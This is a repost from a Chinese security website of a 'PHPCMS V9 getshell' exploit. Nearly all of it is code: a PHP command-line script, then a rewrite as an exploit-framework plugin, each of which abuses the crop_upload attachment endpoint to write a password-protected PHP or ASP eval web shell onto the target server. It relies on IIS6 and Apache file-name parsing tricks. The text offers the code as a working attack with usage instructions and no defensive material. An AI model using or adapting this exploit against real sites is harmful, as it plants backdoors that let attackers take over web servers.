phpcms V9 getshell exp

没穿底裤 2019年12月31日23:08:39评论475 views字数 3906阅读13分1秒阅读模式

#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r(' +---------------------------------------------------------------------------+ PHPCms V9 GETSHELL 0DAY  c0de by testr00ttest 针对iis6.0的漏洞 有点鸡肋 但是也可以用 apache 是老版本可能会产生问题 +---------------------------------------------------------------------------+ '); echo '密码为'.$pass; if ($argc < 2) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' url [js]  js 类型配置  1为asp 2为php  3为apache 的版本 Example: php '.$argv[0].' localhost 1  +---------------------------------------------------------------------------+ '); exit; } $url=$argv[1]; $js=$argv[2];//写入脚本类型  $phpshell='<?php @eval($_POST[/''.$pass.'/']);?>'; $aspshell='<%eval request("'.$pass.'")%>';  if($js==1){         $file="1.asp;1.jpg";          $ret=GetShell($url,$aspshell,$file);  }else if($js==2){         $file="1.php;1.jpg";         $ret=GetShell($url,$phpshell,$file); }else if($js==3){         $file="1.php.jpg";         $ret=GetShell($url,$phpshell,$file); }else{         print_r('没有选择脚本类型'); } $pattern = "|http:////[^,]+?/.jpg,?|U"; preg_match_all($pattern, $ret, $matches); if($matches[0][0]){         echo "/r/nurl地址:".$matches[0][0]; }else{         echo "/r/n没得到!";         }  function GetShell($url,$shell,$js){         $content =$shell;         $data = "POST /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$url."/uploadfile/".$js." HTTP/1.1/r/n";          $data .= "Host: ".$url."/r/n";         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1/r/n";         $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r/n";         $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3/r/n";         $data .= "Connection: close/r/n";         $data .= "Content-Length: ".strlen($content)."/r/n/r/n";         $data .= $content."/r/n";         //echo $data;         $ock=fsockopen($url,80);         if (!$ock) {         echo "  No response from ".$url."/n";         }         fwrite($ock,$data);         $resp = '';         while (!feof($ock)) {                 $resp.=fread($ock, 1024);         }         return $resp; }  ?>
WVE2.0版本。楼主不好意思,我自己改成wve版本了。
<?php class phpcms_v9_upload{    public function info(){     $info=array(             'info'=>array(                     'author'=>'testr00ttest',                    'title'=>'PHPCms V9 upload vulv exploit',                    'info'=>'https://forum.90sec.org/thread-3845-1-1.html|
                ),             'option'=>array(                    'host'=>'localhost',                    'port'=>'80',                    'pass'=>'cmd',            'path'=>'/',            'file'=>'1.asp;1.jpg',            'type'=>'asp'                                                       )          );    return  $info; }   public function run(){     $phpshell='gif89a<?php @eval($_POST[/''.G('pass').'/']);?>';     $aspshell='gif89a<%eval request("'.G('pass').'")%>';     $file=G('file');     Switch (G('type')){            case 'asp':              $shellcode=$aspshell;              break;            case 'php':          $shellcode=$phpshell;                         break;         }     $shellpath='http://'.G('host').'/uploadfile/'.$file;                     $data = "POST ".G('path')."index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=".$shellpath." HTTP/1.1/r/n";         $data .= "Host: ".G('host')."/r/n";         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1/r/n";         $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r/n";         $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3/r/n";         $data .= "Connection: close/r/n";         $data .= "Content-Length: ".strlen($shellcode)."/r/n/r/n";         $data .= $shellcode."/r/n";         $body=Http::sock(G('host'),$data);           if($url=$this->match($body)){         msg('Exploit Success',1);         msg('Shell: ',1);         msg($url,1);         msg('PASS: '.G('pass'),1);         }   }   public function match($str){     $pattern = "|http:////[^,]+?/.jpg,?|U";     preg_match_all($pattern,$str, $matches);     if($matches[0][0]){     return $matches[0][0];                 }else{         return false;         }   } } ?>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:08:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms V9 getshell exphttp://cn-sec.com/archives/75135.html

发表评论

匿名网友 填写信息